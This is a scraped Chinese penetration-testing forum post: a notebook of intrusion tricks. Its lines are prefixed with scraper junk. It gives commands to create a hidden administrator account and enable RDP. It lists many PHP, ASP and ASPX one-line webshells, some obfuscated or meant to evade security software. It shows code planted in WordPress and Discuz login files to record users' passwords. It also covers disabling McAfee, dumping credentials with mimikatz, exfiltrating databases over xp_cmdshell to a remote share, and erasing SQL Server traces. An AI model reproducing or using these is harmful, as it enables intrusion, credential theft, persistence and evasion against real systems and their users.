  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 p1 b( g: S/ P6 P6 s6 O/ `
# v: A( j  p8 Y# t  t$ y  [* a1 J<Connection File> -- 指定连接的 .rdp 文件的名称。

/v:<server[:port]> -- 指定要连接到的终端服务器。
, V2 a" r6 e' A8 ]; Y1 q
/console -- 连接到服务器的控制台会话。
3 b( l7 R5 e( X5 @6 g& b$ z
5 z$ }- y* N3 I% z# Z; E) C4 q/f -- 以全屏模式启动客户端。

/w:<width> --  指定远程桌面屏幕的宽度。
% M$ ]2 u) o, k0 j1 Q
4 ?' P2 Z4 g. T$ C/h:<height> -- 指定远程桌面屏幕的高度。
4 [2 {7 o+ G: i, i$ `5 ?' w# `
/edit -- 打开指定的 .rdp 文件来编辑。
, K3 |( K1 a6 _/ [, `: J
/migrate -- 将客户端连接管理器创建的旧版
' a+ D6 b5 p3 q( a7 g连接文件迁移到新的 .rdp 连接文件。
; h1 W2 M5 `1 _  _& b0 g8 }

其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
) F5 g* ?: t- w9 C5 jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量

命令行下开启3389
net user asp.net aspnet /add
' c- o; G% r1 {# \* u( W  @$ {( ~: Lnet localgroup Administrators asp.net /add
- C+ Z: t' l; R) e6 v! S; r2 `net localgroup "Remote Desktop Users" asp.net /add
/ ~; Q! U" w% I; {; Z( |attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
: ~5 a0 _, w4 }; @3 n7 [* y  ?sc config remoteaccess start= auto
9 _# k3 K2 o/ c  G' t: Vnet start rasman
- C( x  \& z3 q5 W' snet start remoteaccess
/ s8 W2 s2 a+ `5 w0 ?2 s, z) B9 PMedia
<form id="frmUpload" enctype="multipart/form-data"
; Z$ u6 ~& e5 Y7 f5 b6 U& Yaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
- {$ _7 x  n' y8 ~9 [<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2 查看用户的密码
access数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
. b4 _  j! U7 E0 n/ h( _4 ~. n" L测试1：
; L. l4 W0 `9 N, N) ^3 z8 m  y# rSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
1 E8 _. m  {) [, I
测试2：
& \" \/ T; U9 X7 @) J/ {5 T
create table dirs(paths varchar(100),paths1 varchar(100), id int)
! \' ?/ R8 }. ]( A) w$ O0 `+ W; h
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

: s7 q1 W( q% W5 |* TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
7 P0 f+ }- n1 P/ `/ c4 lnet stop mcafeeframework
0 }' J" I  z& F' Enet stop mcshield
net stop mcafeeengineservice
: ~+ t% E. |3 G. Onet stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
* A0 n3 ~+ t+ H
1 m. ^) g6 P3 Q: x1 z$ z# q' \  VNCDump.zip (4.76 KB, 下载次数: 1)
密码在线破解http://tools88.com/safe/vnc.php
, w9 Y; t# c  WVNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取

exec master..xp_cmdshell 'net user'
mssql执行命令。
0 |5 M0 ~; b7 e, t获取mssql的密码hash查询
/ O- M4 M7 H- U2 \select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
" o# r4 j# y, nbackup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
mssql数据库压缩

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
! t8 O  ]& e7 l) d3 C将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。
3 Y" }# G+ O, O; x# @: ]% B2 B
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
0 |$ k/ Q! X  O2 s3 f4 b备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak
( q: {) e. T- z2 x# B2 b7 J
Discuz！nt35渗透要点：
* \8 ?; i# D# t6 i4 G（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
$ `+ X5 H) n7 \1 x! n0 T1 }8 y（3）保存。
: C1 L7 \" v: E/ G; s9 Q（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 S' P3 J1 b' f+ rd:\rar.exe a -r d:\1.rar d:\website\
递归压缩website
注意rar.exe的路径
4 }/ E2 B8 p- X2 d. q; j. R' [
# E& N5 \. I& u' c$ P1 {! n<?php
* J7 _* W( g$ s3 ?  i1 [8 {' }
7 }$ [( B' t* z- K$telok   = "0${@eval($_POST[xxoo])}";

& ~+ o2 h8 o4 ^( e1 X$username   = "123456";
" ?6 Q: r; t; \+ P9 w, K$ L; ?, P
$userpwd   = "123456";

$telhao   = "123456";

3 b' `) |1 ^1 j' x$telinfo   = "123456";

- m$ Y6 z" C$ S9 A8 I/ ^- u  a" a  `?>
php一句话未过滤插入一句话木马
7 s. x! U' d9 H$ g2 [# @$ h7 w
& ]" x( A, s; F, B9 F站库分离脱裤技巧
' M% U  H  |  z. Q+ Gexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
3 J$ X7 e9 w& k; e. jexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
$ y& q8 ^: V# j9 F( F这儿利用的是马儿的专家模式（自己写代码）。
' d! G& D& e* @0 y0 h0 I' M: Tini_set('display_errors', 1);
5 i8 F" u; v9 e# eset_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
( |" y2 k! ^  U3 \' s$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
7 e6 J9 l3 N$ k7 E5 j4 p    $i = $i+1;
. k1 ]5 R( C$ q4 I0 x  c( m4 I1 X7 U    $tmp .=  implode("::", $row)."\n";
  ~4 p: t* ~% Z3 d4 {( c$ L9 J    if(!($i%500)){//500条写入一个文件
7 c8 \' m% G8 _# C9 T- y+ g        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
: w' P8 X" o8 D' V8 c}
mysql_free_result($result);


5 r8 k$ Z& m6 A5 \1 q
//down完后delete
% B# m9 `. D; A" C
$ P& \9 n  u6 |0 ^  v
8 P* k# H9 e4 U+ C* C# T. `ini_set('display_errors', 1);
4 h$ v& G) P7 ~error_reporting(E_ALL);
- X; I4 o, v: G6 W$ @% Y$i = 0;
; [. G( v$ O9 J) j% H1 H" Iwhile($i<32) {
9 k7 T7 y+ b5 T* i$ P" K! Q    $i = $i+1;
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
  z* E3 }% J' B; g7 F# @5 x2 V        unlink($filename);
}
httprint 收集操作系统指纹
扫描192.168.1.100的所有端口
, D1 Z1 ]9 i# k$ h) g/ inmap –PN –sT –sV –p0-65535 192.168.1.100
host -t ns www.owasp.org 识别的名称服务器，获取dns信息
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
9 W0 C* Z  |1 h3 d1 Y, u1 TNetcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host
& a* ?& O: q8 J" ?& m
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
1 E: M0 U. `" O: g' J5 b8 l
　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)
- u' Z: b; v6 S9 \& `8 x
' c. p( V) O# j, B0 |" L6 v　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x

) t/ X- O3 K6 @% {3 {　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
3 P, v% `' P) m, u
　　http://net-square.com/msnpawn/index.shtml (要求安装)

　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
: ]. X1 C' c" N& Q& s4 b
# I! d9 V/ x) ~6 p/ [& M; Y9 j" k; z　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
set names gb2312
6 a9 A- n  f& a) ~$ n导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' R' E' @) y, ^8 [  L' a) ~" y
mysql 密码修改
3 D/ D' ?' L7 G) e5 c. @$ bUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
$ q" l( Y2 h, S9 rupdate user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
高级的PHP一句话木马后门

9 D+ z' Z: ?( E3 j入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀

& |2 R6 ^2 `0 g* e: R1、

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
. J5 h% ?* A8 r, P  s; V) Q
9 U( p' d, F& r5 O6 F& {  p3 i8 w$hh("/[discuz]/e",$_POST['h'],"Access");
3 C, b6 E5 U/ q  r4 }8 x) |
//菜刀一句话
6 m5 M* G2 S( d/ p
2、

$filename=$_GET['xbid'];

1 [8 b# b8 X# Z6 g1 ~6 U3 ?: V' J7 `include ($filename);

//危险的include函数，直接编译任何文件为php格式运行

3、

, m5 W2 p* a! M1 R3 q$reg="c"."o"."p"."y";

4 ~! o0 s: W. l9 o$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

, q1 x4 j$ }* g//重命名任何文件

4、

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
5 K; V7 v( k# V5 T% I
$gzid("/[discuz]/e",$_POST['h'],"Access");
/ Z5 L" d9 g1 l8 U5 C
//菜刀一句话

5、include ($uid);

//危险的include函数，直接编译任何文件为php格式运行，POST
8 i" b! ~/ S! Y* e, ]

. |8 k0 U( j. n9 y+ g+ r//gif插一句话

+ h  b9 U6 Z' c* c+ o0 \6、典型一句话
- c2 h8 C8 }+ O
程序后门代码
1 _4 m! X0 x  m+ P! l9 d<?php eval_r($_POST[sb])?>
, Y3 W- K/ H3 L/ M程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
7 ]/ ?4 X! k3 f/ q. m+ a( d: W程序代码
" ~6 G, W5 L- G4 p<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
3 F$ A7 n" Y# e: Y程序代码
<?$_POST['sa']($_POST['sb']);?>
. z& G* |2 i6 D" e* ?$ T程序代码
- S1 b: ^- p2 x9 c# z4 j<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
: A; s# D( M, P' G- g) }@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
( B3 n) X; n( E7 H) U程序代码
<O>h=@eval_r($_POST[c]);</O>
/ d8 I  S) ^) ~9 W; i! S程序代码
4 ]1 t4 {& @9 c$ q( }8 B<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话
& T6 Z, [* y' K7 e
: G4 j/ Q% n. T2 [( |" D* ahttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
9 p" k; a. H. R8 l0 Q详细用法：
1、到tools目录。psexec \\127.0.0.1 cmd
2、执行mimikatz
; }) b8 S' ~! z2 ^3、执行 privilege::debug
0 X+ B4 t6 N: l1 ?  l7 P4、执行 inject::process lsass.exe sekurlsa.dll
, G! @6 n" ~* u5、执行@getLogonPasswords
, Z" W/ p, |. _; {" [6、widget就是密码
( M( |0 x: U9 U9 E7、exit退出，不要直接关闭否则系统会崩溃。

http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
6 `" D( v% V. ^8 E: `) o$ y
自动查找系统高危补丁
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
* p/ O( @4 k; O' l/ k
8 S* ?+ y% G9 g2 i1 r* `$ Z5 S! w突破安全狗的一句话aspx后门
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工
* h( E5 U: Z8 s/ v9 N8 x在文件wp-login.php中539行处添加：
' `3 t) Q* H+ v/ R6 ^* e2 m& s// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
; y  E5 ?$ |/ H+ k, j$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
$txt=$txt.”\r\n”;
# t$ c$ L# S9 m% {& Y8 c) _* \if($log_user&&$log_pwd&&$log_ip){
# K/ q1 s$ c$ |; g0 \4 T1 T@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
}
  p0 |7 `/ U" Y, e6 W$ J% y0 l1 t( ]当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
就是搜索case ‘login’
5 Z# C, @) R2 b  L- ]在它下面直接插入即可，记录的密码生成在pwd.txt中，
其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
利用II6文件解析漏洞绕过安全狗代码：
: A% t& O: s6 j6 ^2 s;antian365.asp;antian365.jpg
5 o5 W! w) L: t2 _, i# f# p4 H
( ?- {. r1 ]0 d- K5 d" a各种类型数据库抓HASH破解最高权限密码！
1.sql server2000
% T5 i# c6 P' C+ mSELECT password from master.dbo.sysxlogins where name='sa'
& x6 v  S: C/ y: |& W' C( V0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
( o0 k& V6 `9 s1 [2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
6 B- k' `* ]% O0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
- @+ B4 W" E3 c& R5 o2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
8 _, y& \) Q* D9 `crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
8 T) @% L1 n5 y3 C% bSQL server 2005:-
: \0 H( _5 s2 [6 `' j! x* x/ h+ V* T/ iSELECT password_hash FROM sys.sql_logins where name='sa'
5 j8 g) ^5 v, \& ]/ e0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
, B, H" b2 u6 K$ x' c0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; {& u; E6 Z: @2 `( d+ g) e6 q7 w, hcrack case sensitive hash in cain, try brute force and dictionary based attacks.

# ~" f" j! N4 \4 f* b1 X7 y: ]update:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
4 ]9 {1 [# H' de.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

MYSQL:-
9 @; }; y$ \0 m3 n4 ~
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 [% O8 p/ r  R" y$ H
3 f  _! Y) T6 `3 J" `! c*mysql  < 4.1
' d5 t; i9 G- \
mysql> SELECT PASSWORD(‘mypass’);
+ F. j) B* x) ^2 z& v+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e   |
+——————–+
" y8 [- P: a! R! H4 H, U
: V) _% V% y" Y+ H% D% C: T*mysql >=4.1
" F2 h; Q; `, V- c
mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
| PASSWORD(‘mypass’)                        |
  O1 K3 U1 q" t' h5 O3 q+——————————————-+
! E& m+ `* s$ \| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+

Select user, password from mysql.user
! K" u4 ?3 `4 @  ]$ ^6 @% \The hashes can be cracked in ‘cain and abel’
' h  G6 Q0 R7 K: h( l. L; j
5 l  F! r; `* |3 Q% S6 w$ iPostgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
( o7 Z$ z4 \/ o$ Q( P# I4 G" zselect usename, passwd from pg_shadow;
usename      |  passwd
——————+————————————-
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
( n4 C) H, @$ u" }* e8 U1 l0 l
Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….
4 x- V9 z' z6 e* m# a

6 L( c- {+ f% s( d" k+ k5 `! |在sql server2005/2008中开启xp_cmdshell
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
! e. O' Q: l& K/ p9 i; fGO
-- To update the currently configured value for advanced options.
( t( F2 c. e7 t7 l" V* p: |RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
( o7 P; P2 O$ G2 \$ kRECONFIGURE
9 l6 E$ v6 o( t  P- n$ n( J0 r- eGO
SQL 2008 server日志清除，在清楚前一定要备份。
如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
, A& _) y, t& E' `7 T: w- D9 WＸ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
9 s2 ~* w, W- o% l0 W* }
对于SQL Server 2008以前的版本：
5 N  p$ x6 u! k/ h& ASQL Server 2005:
1 q) q6 H% D+ n6 u删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
5 t7 P- V: l7 X) |1 SSQL Server 2000:
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。

- a+ }8 N% u% B  M, s/ ]本帖最后由 simeon 于 2013-1-3 09:51 编辑


9 D) ?$ Z, m( f) j. Mwindows 2008 文件权限修改
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
3 ?! ^7 X1 y# N: R7 k2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
& F$ K- @; W4 d2 U0 F一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，

6 W4 B5 e5 l  t6 K/ \Windows Registry Editor Version 5.00
! {: X" f/ z* i; Y$ q2 ^  ^$ S[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
0 w6 O2 b& m# w"NoWorkingDirectory"=""
- ]  ~+ [" A* V  c% n3 p5 y[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( Y. [. e3 H  u  C  u: }9 o[HKEY_CLASSES_ROOT\exefile\shell\runas2]
" {% t3 a7 y# Y8 l, v@="管理员取得所有权"
"NoWorkingDirectory"=""
4 R& y; K# r1 v/ Y  s[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. G2 Z7 R- M6 L
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
% A" a) w* Y# Z* g* T6 P[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
+ d3 r  y2 |: y0 K. \  s" S@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"


win7右键“管理员取得所有权”.reg导入
二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
1、C:\Windows这个路径的“notepad.exe”不需要替换
$ R$ D: [" J+ O9 x& `- s. ]% p8 e* |3 W0 J2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
$ g+ D9 v8 S+ c' O3、四个“notepad.exe.mui”不要管
/ [1 W3 {4 ^" Q- ^: G4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
% N) c6 l. w8 z* u/ S替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
: u! G  Q$ t2 m. ]! u0 J+ D替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
windows 2008中关闭安全策略：
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6 _, N1 H0 M* n2 f! C8 B$ _修改uc_client目录下的client.php 在
0 q1 H# t% a" K5 J: Dfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
/ s0 p* p! w& c8 y5 K下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
! z# l& k* G5 K" z) {( Fif(getenv('HTTP_CLIENT_IP')) {
* i  M* y, v- I* z$ b2 o$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
7 `, Y3 G2 K: z" j& i8 C$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$onlineip = getenv('REMOTE_ADDR');
} else {
' q8 U3 O- W$ x) H0 u$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 E1 U3 U) C* r+ o, `7 R$ y2 O}
     $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
    $handle=fopen('./data/cache/csslog.php','a+');
    $write=fwrite($handle,$record);

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2